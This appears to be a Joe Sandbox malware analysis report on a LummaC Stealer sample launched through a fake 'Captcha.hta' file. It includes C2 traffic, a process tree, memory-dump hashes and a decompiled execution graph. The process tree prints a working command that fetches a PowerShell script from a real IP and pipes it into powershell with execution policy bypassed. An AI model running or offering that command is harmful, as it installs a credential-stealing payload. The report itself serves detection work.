                                                    2024-12-12 16:34:05 UTC15331OUTData Raw: 27 d5 ff 31 64 7f 84 61 91 70 b2 73 93 f8 6a cc b6 1f 12 37 cb 3f f8 39 ff af 67 7c fe c7 11 ea 6a 37 f3 1f 8e 8e de 2b 8e 50 86 90 99 60 26 91 2d b6 7f eb ef 6c 5e d2 02 24 b8 7c 26 89 51 6b d1 5b 67 6d d1 6b 05 24 8c 2a 00 07 a5 af 01 71 ab 10 55 40 75 b9 71 fb 14 bd 00 44 29 f5 6e 3a ce 04 ef c6 18 8c b9 b9 84 5e 1a 70 6c 2b 5d 25 f0 65 ff 87 91 8d 83 59 31 90 89 45 29 20 c7 a0 3e 2b b2 c2 ef 99 e5 a6 5e b8 9a 34 dc e9 a3 ba b2 cd cd f5 25 d1 f7 6d d6 01 39 fd f3 7b 69 e4 d0 4a df 30 29 6a 5f 35 6c c5 71 ee 63 f9 9b e4 c4 bc 67 dc ef 26 0f 22 cf 1c 93 68 91 bd 9a 40 74 33 f0 1f fc 36 f1 af b5 51 08 6b 51 03 a8 33 88 b2 07 a8 16 3f 1a 32 52 8a 76 09 68 a7 8e fb 1c 0b 95 6a 1c d6 d3 65 55 02 36 bc e1 11 a0 fe 72 0a e5 52 e6 b2 c6 5a be 61 89 aa ec d1 df
                                                    Data Ascii: '1dapsj7?9g|j7+P`&-l^$|&Qk[gmk$*qU@uqD)n:^pl+]%eY1E) >+^4%m9{iJ0)j_5lqcg&"h@t36QkQ3?2RvhjeU6rRZa
                                                    2024-12-12 16:34:08 UTC1028INHTTP/1.1 200 OK
                                                    Date: Thu, 12 Dec 2024 16:34:08 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=s50t1paosn5utt1iuinhqvc9se; expires=Mon, 07-Apr-2025 10:20:46 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DyF93f%2B%2FjFX1R11q7q7khzQdn8rtVS7L%2BPdqDBWyC9MEKPvekrhMZyK6n3QsOKrmRNyvcpi3%2BogCKx9oVBU4kmbT3mTd1ro7IuEbAH%2BxPupQ1VJ9fLOCtVnjHo61hM8VsbI%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f0f1eb1185e69f2-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=114131&min_rtt=114078&rtt_var=24152&sent=473&recv=831&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1051133&delivery_rate=33517&cwnd=252&unsent_bytes=0&cid=0f4bfa0967de3b77&ts=2802&x=0"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.11.2049718172.67.207.384431848C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-12 16:34:08 UTC263OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 83
                                                    Host: immureprech.biz
                                                    2024-12-12 16:34:08 UTC83OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 55 6b 67 4c 76 2d 2d 45 42 41 4c 41 59 26 6a 3d 26 68 77 69 64 3d 41 42 45 34 41 34 35 44 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33
                                                    Data Ascii: act=get_message&ver=4.0&lid=DUkgLv--EBALAY&j=&hwid=ABE4A45DB129FD4CDB71E32F12885CB3
                                                    2024-12-12 16:34:09 UTC1015INHTTP/1.1 200 OK
                                                    Date: Thu, 12 Dec 2024 16:34:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=spqp1joc91crsvd2jobuekg8el; expires=Mon, 07-Apr-2025 10:20:48 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NDrQ0cxjQG0SiQjTqkQL4MmkrGBi23vqzvXzLOWrx2U6%2FqMTSA6s80Mt8VLR%2FA2zW1z3vHzEpHf9QUCp2g%2Bflst5Mb2aWKAm8WKiagd5VUFN7wDpQU13KxpCCDplWFxlM4s%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f0f1ec4fec17bca-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=114069&min_rtt=113942&rtt_var=24137&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=982&delivery_rate=33607&cwnd=252&unsent_bytes=0&cid=78b7573fb81887e3&ts=902&x=0"
                                                    2024-12-12 16:34:09 UTC54INData Raw: 33 30 0d 0a 6a 41 2f 75 6f 54 30 72 33 70 45 41 49 4e 45 41 6f 6a 66 48 2f 62 37 42 75 78 70 52 67 76 77 42 64 64 57 6b 49 44 47 74 6e 70 6e 58 55 67 3d 3d 0d 0a
                                                    Data Ascii: 30jA/uoT0r3pEAINEAojfH/b7BuxpRgvwBddWkIDGtnpnXUg==
                                                    2024-12-12 16:34:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:11:33:54
                                                    Start date:12/12/2024
                                                    Path:C:\Windows\SysWOW64\mshta.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:mshta.exe "C:\Users\user\Desktop\Captcha.hta"
                                                    Imagebase:0xb70000
                                                    File size:13'312 bytes
                                                    MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:11:33:54
                                                    Start date:12/12/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -
                                                    Imagebase:0x570000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:11:33:54
                                                    Start date:12/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6b1c00000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:11:33:54
                                                    Start date:12/12/2024
                                                    Path:C:\Windows\SysWOW64\curl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1
                                                    Imagebase:0x5b0000
                                                    File size:386'560 bytes
                                                    MD5 hash:4329254E74AD91D047E3CEDCC7C138C3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:11:33:54
                                                    Start date:12/12/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:powershell -NoProfile -ExecutionPolicy Bypass -Command -
                                                    Imagebase:0xc50000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000004.00000002.4103780633.00000000058D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:11:33:57
                                                    Start date:12/12/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline"
                                                    Imagebase:0xf60000
                                                    File size:2'141'552 bytes
                                                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:11:33:57
                                                    Start date:12/12/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA2B.tmp" "c:\Users\user\AppData\Local\Temp\cqvy0dal\CSC988509BDD3DA4C1893528181DB7478.TMP"
                                                    Imagebase:0xf50000
                                                    File size:46'832 bytes
                                                    MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:11:33:58
                                                    Start date:12/12/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                    Imagebase:0x640000
                                                    File size:65'440 bytes
                                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    Reset < >
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000003.4064869570.0000000006D30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_3_6d30000_mshta.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                      • Instruction ID: 07af50981ec2282c2e5c66a3c7af98c3e86f8200d87f03ee080c4e29cc453e53
                                                      • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                      • Instruction Fuzzy Hash:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000003.4064869570.0000000006D30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_3_6d30000_mshta.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                      • Instruction ID: 07af50981ec2282c2e5c66a3c7af98c3e86f8200d87f03ee080c4e29cc453e53
                                                      • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                      • Instruction Fuzzy Hash:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000003.4064869570.0000000006D30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_3_6d30000_mshta.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                      • Instruction ID: 07af50981ec2282c2e5c66a3c7af98c3e86f8200d87f03ee080c4e29cc453e53
                                                      • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                      • Instruction Fuzzy Hash:
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.4106172583.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7040000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \}i$\}i
                                                      • API String ID: 0-1667594419
                                                      • Opcode ID: 557c2065bfc85fc8527ab4080939a412eb2cdfb72557dcaebcc554f6eed51902
                                                      • Instruction ID: a8c08342e83cac765859bbc84b93f8d2cd73e60e44fd411b9eca23b0dd9e7a0a
                                                      • Opcode Fuzzy Hash: 557c2065bfc85fc8527ab4080939a412eb2cdfb72557dcaebcc554f6eed51902
                                                      • Instruction Fuzzy Hash: 4E0206F1B002959FDB64DF64C850B6ABBE6BFC6210F24827AE8169B351DB31DC41CB91
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.4106172583.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7040000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: abe496c5d8bcdfd1247259c176e00b5fd32c9b7095437e94406d1046a962f010
                                                      • Instruction ID: dceba15a99112639878e9b2a66cfdc2291a35b1d6a7a91fe6174e3d241994167
                                                      • Opcode Fuzzy Hash: abe496c5d8bcdfd1247259c176e00b5fd32c9b7095437e94406d1046a962f010
                                                      • Instruction Fuzzy Hash: 54F18AF1B043859FDB649B79C81077EBBE6AFD5210F24867AE416DB281DB31C842C7A1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.4106172583.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7040000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 164ed741723cef31eac3ef213edc44a04a6fa48d584db684b3f1c76b70ff2ac6
                                                      • Instruction ID: 358c240f8e4e9d5be6703f81fc69faf39c44cbfc371af96e817b0cd465fa1757
                                                      • Opcode Fuzzy Hash: 164ed741723cef31eac3ef213edc44a04a6fa48d584db684b3f1c76b70ff2ac6
                                                      • Instruction Fuzzy Hash: 2AE16BF6B043468FCB25DB69C4106AABBE6BFC6220B14C2BAE555DB251DB31C842C7D1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.4106172583.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7040000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 06809adb0523afe3694192c70b4f082a2301aa39f996f4789f2c39499f01edd4
                                                      • Instruction ID: ee262a0b7f8b0881473ee0bbbb9498a1f1972e93fd1325eb935a33f3156c7507
                                                      • Opcode Fuzzy Hash: 06809adb0523afe3694192c70b4f082a2301aa39f996f4789f2c39499f01edd4
                                                      • Instruction Fuzzy Hash: 7021B6F4E04286DFDF608F25C540B6A7BF1AF86220F1983B6E8248B162D734D845CB51
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.4099549974.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_c3d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7512ce07656868bd3b002e54a0d9e4a358bba893958ff6e135deb2dc65f8db86
                                                      • Instruction ID: ff6a0b9e7e7b6282143563fe347d2cebbf828575b49d8191cfcfd386cf01a9dd
                                                      • Opcode Fuzzy Hash: 7512ce07656868bd3b002e54a0d9e4a358bba893958ff6e135deb2dc65f8db86
                                                      • Instruction Fuzzy Hash: 61210171604340EFDB04DF14D9C0B26BFA5FB84328F24C9ADE8094B286C77AD846DB62
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.4106172583.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7040000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ad2bc0973441f2670779c1a5a9798fd4a3dfcbd5cfa06c414c54b62dd6023cd1
                                                      • Instruction ID: 17bb605a306ec26baec2fb6feb7bf3864fd3a643bc09d847bf828047a054adf5
                                                      • Opcode Fuzzy Hash: ad2bc0973441f2670779c1a5a9798fd4a3dfcbd5cfa06c414c54b62dd6023cd1
                                                      • Instruction Fuzzy Hash: 3421C3F1B042029FCB74CF69C850A6ABBF1FF49260F1882B6E815DB251D731D890CB91
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.4099549974.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_c3d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8911cbd85c5730c87f3f82108476fec3023e6c4772167f069a2629271537fb1
                                                      • Instruction ID: 738d5a68c5094cbb5f5cd6df8c5fe3044264418b798ed7e377cbc5a959c10555
                                                      • Opcode Fuzzy Hash: e8911cbd85c5730c87f3f82108476fec3023e6c4772167f069a2629271537fb1
                                                      • Instruction Fuzzy Hash: 6A119D75504280DFDB12CF14D9C4B15FFA1FB84328F28C6AAD8494B696C33AD95ACB61
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.4099549974.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_c3d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bc6e75dd69cc320fd37d6da3420485872d3013b2c226eebd1cb080771bdfddcf
                                                      • Instruction ID: 0408b875bbfb58e16337e2baa3399c0c33001ff54de1d0d8d810b39743cef7cf
                                                      • Opcode Fuzzy Hash: bc6e75dd69cc320fd37d6da3420485872d3013b2c226eebd1cb080771bdfddcf
                                                      • Instruction Fuzzy Hash: 36015E6240E3C09FE7128B259C94B52BFB4DF53624F1D80DBD8998F2A3C2699C49C772
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.4099549974.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_c3d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fed5652cc37d3ef4dcdac9c9b0c20e472cdd7bbf3eadf0828f1c91a8b7d1b255
                                                      • Instruction ID: 1e843caa2c395a309ef495cfed23c6b947954a8dbe2c278e0c48269cc32ad47c
                                                      • Opcode Fuzzy Hash: fed5652cc37d3ef4dcdac9c9b0c20e472cdd7bbf3eadf0828f1c91a8b7d1b255
                                                      • Instruction Fuzzy Hash: DD01A2314183809FE7144E26E8C4B67FF98DF91B24F18842AEC5A0A242D679D985CAB1

                                                      Execution Graph

                                                      Execution Coverage:10.6%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:74.3%
                                                      Total number of Nodes:342
                                                      Total number of Limit Nodes:15
                                                      execution_graph 13387 438e47 13388 438e51 RtlAllocateHeap 13387->13388 13707 42e506 CoSetProxyBlanket 13394 40e648 CoInitializeSecurity 13395 43aecc 13396 43af00 13395->13396 13398 43af7e 13396->13398 13399 43a9b0 LdrInitializeThunk 13396->13399 13399->13398 13708 408790 13710 40879f 13708->13710 13709 408970 ExitProcess 13710->13709 13711 4087b4 GetCurrentProcessId GetCurrentThreadId 13710->13711 13712 40896b 13710->13712 13714 4087da 13711->13714 13715 4087de SHGetSpecialFolderPathW GetForegroundWindow 13711->13715 13721 43a930 13712->13721 13714->13715 13716 40887a 13715->13716 13716->13712 13718 40b9d0 FreeLibrary 13716->13718 13719 40b9ec 13718->13719 13720 40b9f1 FreeLibrary 13719->13720 13720->13712 13724 43bee0 13721->13724 13723 43a935 FreeLibrary 13723->13709 13725 43bee9 13724->13725 13725->13723 13400 40db51 13401 40db5d 13400->13401 13418 423410 13401->13418 13403 40db7f 13425 425990 13403->13425 13407 40dbc6 13450 4310d0 OpenClipboard 13407->13450 13409 40dc10 13410 423410 2 API calls 13409->13410 13411 40dc4e 13410->13411 13412 425990 2 API calls 13411->13412 13413 40dc8c 13412->13413 13414 425e90 3 API calls 13413->13414 13415 40dc95 13414->13415 13416 4310d0 6 API calls 13415->13416 13417 40dcdf 13416->13417 13423 4234b0 13418->13423 13419 4235af 13457 41f040 13419->13457 13421 43cfb0 LdrInitializeThunk 13421->13423 13423->13419 13423->13421 13424 423673 13423->13424 13461 43d2f0 13423->13461 13424->13403 13426 4259c0 13425->13426 13429 425a2e 13426->13429 13496 43a9b0 LdrInitializeThunk 13426->13496 13427 40dbbd 13433 425e90 13427->13433 13429->13427 13432 425b1e 13429->13432 13497 43a9b0 LdrInitializeThunk 13429->13497 13430 438e70 RtlFreeHeap 13430->13427 13432->13430 13498 425eb0 13433->13498 13435 425ea4 13435->13407 13438 4266e2 13439 426913 13438->13439 13440 426927 13438->13440 13443 426905 CopyFileW 13438->13443 13446 4266f5 13438->13446 13442 43c9a0 LdrInitializeThunk 13439->13442 13515 43ccb0 13440->13515 13442->13440 13443->13439 13444 426974 13447 4269a9 13444->13447 13449 426ae5 13444->13449 13519 43cd60 13444->13519 13446->13407 13447->13407 13447->13449 13525 43a9b0 LdrInitializeThunk 13447->13525 13449->13407 13449->13449 13451 4310f4 GetWindowLongW GetClipboardData 13450->13451 13452 43124f 13450->13452 13453 43112b GlobalLock 13451->13453 13454 431249 CloseClipboard 13451->13454 13452->13409 13456 431141 13453->13456 13454->13452 13455 43123d GlobalUnlock 13455->13454 13456->13455 13458 41f080 13457->13458 13458->13458 13469 4210e0 13458->13469 13460 41f0d5 13460->13424 13462 43d310 13461->13462 13465 43d34e 13462->13465 13494 43a9b0 LdrInitializeThunk 13462->13494 13463 43d572 13463->13423 13465->13463 13468 43d41e 13465->13468 13495 43a9b0 LdrInitializeThunk 13465->13495 13466 438e70 RtlFreeHeap 13466->13463 13468->13466 13482 43c9a0 13469->13482 13471 421832 13471->13460 13472 421123 13472->13471 13475 4211d2 13472->13475 13486 43a9b0 LdrInitializeThunk 13472->13486 13474 438e70 RtlFreeHeap 13476 4217ca 13474->13476 13478 4217af 13475->13478 13487 43a9b0 LdrInitializeThunk 13475->13487 13488 438e70 13475->13488 13476->13471 13492 43a9b0 LdrInitializeThunk 13476->13492 13478->13474 13479 4218a0 13478->13479 13479->13460 13484 43c9c0 13482->13484 13483 43cace 13483->13472 13484->13483 13493 43a9b0 LdrInitializeThunk 13484->13493 13486->13472 13487->13475 13489 438e83 13488->13489 13490 438e94 13488->13490 13491 438e88 RtlFreeHeap 13489->13491 13490->13475 13491->13490 13492->13476 13493->13483 13494->13465 13495->13468 13496->13429 13497->13432 13499 425ef0 13498->13499 13499->13499 13526 438ea0 13499->13526 13503 425f67 13548 4392b0 13503->13548 13504 425f5b 13504->13503 13538 439830 13504->13538 13508 4370b0 13512 4370e0 13508->13512 13510 43d2f0 2 API calls 13510->13512 13511 43722c 13511->13438 13512->13510 13512->13511 13568 43cfb0 13512->13568 13572 43d830 13512->13572 13580 43a9b0 LdrInitializeThunk 13512->13580 13517 43ccd0 13515->13517 13516 43cd0e 13516->13444 13517->13516 13584 43a9b0 LdrInitializeThunk 13517->13584 13521 43cd80 13519->13521 13520 43ce3e 13520->13447 13523 43cdbe 13521->13523 13585 43a9b0 LdrInitializeThunk 13521->13585 13523->13520 13586 43a9b0 LdrInitializeThunk 13523->13586 13525->13446 13527 438ec0 13526->13527 13529 438f3e 13527->13529 13552 43a9b0 LdrInitializeThunk 13527->13552 13529->13529 13531 425f4f 13529->13531 13533 43905e 13529->13533 13553 43a9b0 LdrInitializeThunk 13529->13553 13530 438e70 RtlFreeHeap 13530->13531 13534 439140 13531->13534 13533->13530 13535 439152 13534->13535 13536 43923e 13534->13536 13535->13536 13554 43a9b0 LdrInitializeThunk 13535->13554 13536->13504 13539 439880 13538->13539 13547 43990e 13539->13547 13555 43a9b0 LdrInitializeThunk 13539->13555 13540 439fee 13540->13504 13543 439f4b 13543->13540 13564 43a9b0 LdrInitializeThunk 13543->13564 13546 43a9b0 LdrInitializeThunk 13546->13547 13547->13540 13547->13543 13547->13546 13547->13547 13556 439650 13547->13556 13560 439740 13547->13560 13549 4392c5 13548->13549 13551 425e99 13548->13551 13549->13551 13567 43a9b0 LdrInitializeThunk 13549->13567 13551->13435 13551->13508 13552->13529 13553->13533 13554->13536 13555->13547 13557 439670 13556->13557 13559 4396fe 13557->13559 13565 43a9b0 LdrInitializeThunk 13557->13565 13559->13547 13561 439760 13560->13561 13561->13561 13562 4397ee 13561->13562 13566 43a9b0 LdrInitializeThunk 13561->13566 13562->13547 13564->13540 13565->13559 13566->13562 13567->13551 13569 43cfd0 13568->13569 13569->13569 13570 43d06f 13569->13570 13581 43a9b0 LdrInitializeThunk 13569->13581 13570->13512 13573 43d841 13572->13573 13576 43d92e 13573->13576 13582 43a9b0 LdrInitializeThunk 13573->13582 13574 43db06 13574->13512 13576->13574 13578 43da4e 13576->13578 13583 43a9b0 LdrInitializeThunk 13576->13583 13577 438e70 RtlFreeHeap 13577->13574 13578->13577 13580->13512 13581->13570 13582->13576 13583->13578 13584->13516 13585->13523 13586->13520 13726 40ea11 CoInitializeEx CoInitializeEx 13727 422e93 13728 422e9b 13727->13728 13736 43cb20 13728->13736 13730 423137 13730->13730 13731 4210e0 2 API calls 13730->13731 13732 423281 13730->13732 13731->13732 13733 423121 GetLogicalDrives 13735 43cb20 LdrInitializeThunk 13733->13735 13734 422fd1 13734->13730 13734->13732 13734->13733 13734->13734 13735->13730 13737 43cb40 13736->13737 13738 43cc5e 13737->13738 13740 43a9b0 LdrInitializeThunk 13737->13740 13738->13734 13740->13738 13741 43ab91 13742 43ab9a GetForegroundWindow 13741->13742 13743 43abad 13742->13743 13587 43a950 13588 43a976 13587->13588 13589 43a995 13587->13589 13590 43a968 13587->13590 13592 43a98a 13587->13592 13593 43a97b RtlReAllocateHeap 13588->13593 13591 438e70 RtlFreeHeap 13589->13591 13590->13588 13590->13589 13591->13592 13593->13592 13749 40d696 13750 40d6f0 13749->13750 13750->13750 13751 40d73e 13750->13751 13753 43a9b0 LdrInitializeThunk 13750->13753 13753->13751 13755 4156a0 13756 4156a5 13755->13756 13765 4156fe 13756->13765 13768 43a9b0 LdrInitializeThunk 13756->13768 13758 415b79 13759 415c0b 13758->13759 13760 415ef8 13758->13760 13763 415ca6 13758->13763 13766 415cd0 13758->13766 13769 41bea0 13759->13769 13761 41bea0 LdrInitializeThunk 13760->13761 13761->13763 13764 415948 CryptUnprotectData 13764->13758 13764->13765 13765->13758 13765->13764 13766->13760 13766->13763 13767 43cb20 LdrInitializeThunk 13766->13767 13767->13766 13768->13765 13770 41bf0b 13769->13770 13771 41bec4 13769->13771 13770->13763 13771->13770 13771->13771 13782 414070 13771->13782 13783 414090 13782->13783 13784 43c9a0 LdrInitializeThunk 13783->13784 13785 4141ad 13784->13785 